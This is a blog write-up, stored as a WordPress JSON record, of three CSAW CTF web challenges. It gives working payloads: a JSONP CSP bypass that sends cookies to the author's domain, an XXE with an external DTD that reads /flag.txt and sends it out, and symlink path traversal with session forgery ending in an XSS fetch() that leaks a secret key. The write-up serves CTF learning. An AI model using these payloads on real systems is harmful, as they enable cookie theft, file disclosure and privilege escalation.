{"id":660,"date":"2019-09-15T17:30:12","date_gmt":"2019-09-15T21:30:12","guid":{"rendered":"http:\/\/www.wispwisp.com\/?p=660"},"modified":"2024-10-17T18:21:56","modified_gmt":"2024-10-17T18:21:56","slug":"csaw-ctfweb","status":"publish","type":"post","link":"https:\/\/www.wispwisp.com\/index.php\/2019\/09\/15\/csaw-ctfweb\/","title":{"rendered":"CSAW CTF(Web)"},"content":{"rendered":"

Note: This write-up doesn’t explain all the steps. Feel free to email me at peipei123gt@gmail.com<\/a> if you’re not sure how I got X.\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n#BabyCSP:<\/strong>
\n1. Bad CSP rule:<\/span><\/strong>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n2. Submit a post with the payload and report to admin:<\/span><\/strong>
\n<script src='https:\/\/accounts.google.com\/o\/oauth2\/revoke?callback=document.location=\"https:\/\/www.wispwisp.com\/?aa=\"%2bdocument.cookie;a'><\/script><\/code><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n3. Wait, and Got flag in \/var\/log\/apache2\/access.log:<\/span><\/strong>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nCSP bypass(with JSONP) reference:<\/span><\/strong>
\nhttps:\/\/www.slideshare.net\/Hacken_Ecosystem\/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy<\/span><\/a>
\nhttps:\/\/github.com\/zigoo0\/JSONBee<\/span><\/a>
\nhttps:\/\/github.com\/google\/csp-evaluator\/blob\/master\/whitelist_bypasses\/jsonp.js<\/span><\/a>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n#unagi:<\/strong><\/span>
\nXXE payload:<\/span>
\nhttps:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/XXE%20Injection<\/a><\/span>
\nXXE Waf bypass:<\/span>
\nhttps:\/\/mohemiv.com\/tags\/xxe\/<\/a><\/span>
\n1. Create payload.xml:<\/span><\/strong><\/p>\n

<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY % sp SYSTEM \"http:\/\/www.wispwisp.com\/ctf\/csaw.dtd\">\n%sp;\n%param1;\n]>\n<r>&exfil;<\/r><\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n2. Convert the file to bypass WAF:<\/span><\/strong><\/p>\n
cat payload.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n3. Host this dtd file(http:\/\/www.wispwisp.com\/ctf\/csaw.dtd):<\/span><\/strong><\/p>\n
<!ENTITY % data SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/flag.txt\">\n<!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http:\/\/wispwisp.com\/dtd.xml?%data;'>\"><\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n4. Upload Payload.xml<\/span><\/strong>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n5. Got base64 encoded flag in \/var\/log\/apache2\/access.log:<\/span><\/strong>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n6. Base64 decode:<\/span><\/strong>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n#Secure File Storage<\/strong><\/span>
\n(I failed to solve this challenge during the CTF, because I didn’t realize the bot can not visit HTTPS site. I change my payload from HTTPS to HTTP then I receive the Key. Sad \ud83d\ude22 )
\n0: Download the Client.py provide by the challenge, empty the main function.<\/strong><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n1. Register account + Login + Get SessionID + Upload random file(ex: temp.txt)<\/strong><\/span><\/p>\n
username_tmp = \"randomusername\"\npassword = \"randompassword\"\napi_register(username_tmp, password)\napi_login(username_tmp, password)\nsess_id_1 = session.cookies['PHPSESSID']\napi_create_file(\"temp.txt\", \"aaa\")<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n2. Symlink+read+edit => arbitrary file read\/write<\/strong><\/span><\/p>\n
api_create_symlink(\"etc_passwd\", \"\/..\/..\/..\/..\/..\/..\/etc\/passwd\")\nprint(api_get_file('etc_passwd'))\n<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n3. Get all the source code from the server with symlink+read, review source code to gain more information.<\/strong><\/span><\/p>\n
api_create_symlink(\"web_file\", \"\/..\/..\/..\/..\/..\/..\/var\/www\/html\/index.php\")\nprint(api_get_file('web_file'))<\/pre>\n
Repeat for all files:<\/p>\n
\/var\/www\/html\/*\n\/var\/www\/html\/views\/*<\/pre>\n
 \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c\u00a0<\/span>
\n4. Symlink tmp directory, current PHP session file. Edit session file to get admin privileges and list the tmp directory<\/strong><\/span><\/p>\n
api_create_symlink(\"tmp.txt\", \"\/..\/..\/..\/..\/..\/..\/..\/..\/tmp\/\")\napi_create_symlink(\"session.txt\", \"\/..\/..\/..\/..\/..\/..\/..\/..\/tmp\/sess_{}\".format(sess_id_1))\nprint(api_get_file('session.txt'))<\/span><\/pre>\n
Change privs to 15<\/strong> to gain admin privileges, and list the \/tmp directory:<\/p>\n
api_update_file('session.txt', 'current_user|O:4:\"User\":4:{s:8:\"username\";s:14:\"randomusername\";\ns:8:\"password\";s:60:\"$2y$10$1N3EwIDExK2SBz9f.6xhWuENRJ7Cr6RRckqpL2EPvtLXOM1QKtzDe\";s:5:\"privs\";\ns:2:\"15\";s:2:\"id\";i:230;}')\nprint(api_list_files('tmp.txt'))<\/span><\/pre>\n
In postman:<\/span>
\n\"\"
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n5. symlink+read -> get encrypted flag.txt<\/strong><\/span>
\nAfter reading the source code, I know the flag path is: \/tmp\/user_data\/1\/flag.txt<\/span><\/p>\n
api_create_symlink(\"flag.txt\", \"\/..\/..\/..\/..\/..\/..\/..\/tmp\/user_data\/1\/flag.txt\")\nprint(api_get_file('flag.txt'))\n<\/span><\/pre>\n
\"\"
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n6. Write a script to find the admin session file(in \/tmp), the username in the session file will be ‘admin’.\u00a0<\/strong><\/span>
\nThe script should tell you the admin session file is: sess_4umud1lupqn0mpibor27r283o1<\/strong><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n7. Symlink + edit modify admin session file, change the username to XSS payload.<\/strong><\/span><\/p>\n
api_create_symlink(\"admin_session\", \"\/..\/..\/..\/..\/..\/..\/tmp\/sess_4umud1lupqn0mpibor27r283o1\")\n<\/span>\napi_update_file('admin_session', 'current_user|O:4:\"User\":4:{s:8:\"username\";s:81:\"<script> fetch(\n'http:\/\/www.wispwisp.com?key='+localStorage.encryptSecret)<\/script>\";s:8:\"password\";s:6 0:\"$2y$10\n$H38hS7IMk1MzSg\/usdBvjuRucRGkEKrc\/tJhJQOD7249oRpNqWc5O\";s:5:\"privs\";s:2:\"15\";s:2:\"id\";s:1:\"1\";}')<\/span><\/pre>\n
my payload:
\n<script> fetch( 'http:\/\/www.wispwisp.com?key='+localStorage.encryptSecret)<\/script><\/code><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n8. Wait for Admin visit the admin Page, and receive the decryption key: <\/strong><\/span>
\n\"\"
\nlocalStorage.encryptSecret: wvEXTzNpd5xPostMnBqsqHzfz7Ns1yjqL9kwsuAx4ds=<\/strong><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n9. Decrypt the Cipher(encrypted flag) with the Key to get the flag:<\/strong><\/span>
\n\"\"<\/p>\n
\"\"<\/p>\n","protected":false},"excerpt":{"rendered":"
Note: This write-up doesn’t explain all the steps. Feel free to email me at peipei123gt@gmail.com if you’re not sure how I got X.\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c #BabyCSP: 1. Bad CSP rule: \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c 2. Submit a post with the payload and report to admin: […]<\/p>\n","protected":false},"author":1,"featured_media":686,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/660"}],"collection":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/comments?post=660"}],"version-history":[{"count":5,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/660\/revisions"}],"predecessor-version":[{"id":1249,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/660\/revisions\/1249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media\/686"}],"wp:attachment":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media?parent=660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/categories?post=660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/tags?post=660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}